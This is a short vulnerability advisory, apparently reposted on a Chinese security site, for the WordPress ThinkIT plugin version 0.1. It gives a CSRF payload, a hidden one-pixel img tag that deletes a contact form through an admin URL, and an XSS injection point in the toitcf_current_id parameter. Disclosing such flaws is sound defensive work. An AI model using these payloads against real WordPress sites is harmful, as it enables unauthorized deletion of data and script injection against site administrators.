########################################################### # 标题: Wordpress ThinkIT plugin - CSRF / XSS # 发现者: Yashar shahinzadeh # 官网: http://thinkoverit.com/ # 测试环境: Linux & Windows, PHP 5.2.9 # 影响版本: 0.1 ################################################################ 摘要 ======== 1. CSRF - Delete a form 2. Cross site scripting 1. CSRF - Delete a form: ======================== Contact form ID can be easily understood from HTML page source, <input type="hidden" value="[ID]" name="toit-form-id"></input>, which [ID] is the form ID, following crafted exploit may be used so as to delete form completely: <img src="http://[ WP ]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1"> Obviously, ID must be replaced. 2. Cross site scripting: ======================== http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf /** Yasshar shahinzadeh **/
查看更多关于Wordpress插件ThinkIT 0.1多个缺陷 - 网站安全 - 自学的详细内容...